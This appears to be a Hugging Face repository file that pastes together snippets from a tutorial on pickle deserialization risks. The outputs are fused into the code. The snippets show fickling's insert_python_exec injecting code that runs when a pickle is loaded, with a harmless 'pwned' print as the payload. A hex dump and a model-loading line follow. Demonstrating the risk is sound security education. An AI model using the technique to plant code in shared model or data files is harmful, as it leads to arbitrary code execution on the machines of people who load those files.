Hugging Face's logo

VKcyber8k
/
Vd.01

Model card Files Community
Vd.01 / App.py
VKcyber8k's picture
VKcyber8k
Create App.py
4b8f474
raw
history blame
No virus
2.7 kB
import pickle
import pickletools
var = "data I want to share with a friend"
# store the pickle data in a file named 'payload.pkl'
with open('payload.pkl', 'wb') as f:
pickle.dump(var, f)
# disassemble the pickle
# and print the instructions to the command line
with open('payload.pkl', 'rb') as f:
pickletools.dis(f) 0: \x80 PROTO 4
2: \x95 FRAME 48
11: \x8c SHORT_BINUNICODE 'data I want to share with a friend'
57: \x94 MEMOIZE (as 0)
58: . STOP
highest protocol among opcodes = 4import pickle
import pickletools
class Data:
def __init__(self, important_stuff: str):
self.important_stuff = important_stuff
d = Data("42")
with open('payload.pkl', 'wb') as f:
pickle.dump(d, f)from fickling.pickle import Pickled
import pickle
# Create a malicious pickle
data = "my friend needs to know this"
pickle_bin = pickle.dumps(data)
p = Pickled.load(pickle_bin)
p.insert_python_exec('print("you\'ve been pwned !")')
with open('payload.pkl', 'wb') as f:
p.dump(f)
# innocently unpickle and get your friend's data
with open('payload.pkl', 'rb') as f:
data = pickle.load(f)
print(data)you've been pwned !
my friend needs to know this# cat payload.pkl
c__builtin__
exec
(Vprint("you've been pwned !")
tR my friend needs to know this.%
# hexyl payload.pkl
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚00000000β”‚ 63 5f 5f 62 75 69 6c 74 β”Š 69 6e 5f 5f 0a 65 78 65 β”‚c__builtβ”Šin___exeβ”‚
β”‚00000010β”‚ 63 0a 28 56 70 72 69 6e β”Š 74 28 22 79 6f 75 27 76 β”‚c_(Vprinβ”Št("you'vβ”‚
β”‚00000020β”‚ 65 20 62 65 65 6e 20 70 β”Š 77 6e 65 64 20 21 22 29 β”‚e been pβ”Šwned !")β”‚
β”‚00000030β”‚ 0a 74 52 80 04 95 20 00 β”Š 00 00 00 00 00 00 8c 1c β”‚_tRΓ—β€’Γ— 0β”Š000000Γ—β€’β”‚
β”‚00000040β”‚ 6d 79 20 66 72 69 65 6e β”Š 64 20 6e 65 65 64 73 20 β”‚my frienβ”Šd needs β”‚
β”‚00000050β”‚ 74 6f 20 6b 6e 6f 77 20 β”Š 74 68 69 73 94 2e β”‚to know β”ŠthisΓ—. β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”˜# ...
opcodes_stack = [exec_func, "malicious argument", "REDUCE"]
opcode = stack.pop()
if opcode == "REDUCE":
arg = opcodes_stack.pop()
callable = opcodes_stack.pop()
opcodes_stack.append(callable(arg))
# ...from transformers import AutoModel
model = AutoModel.from_pretrained("bert-base-cased", from_flax=True)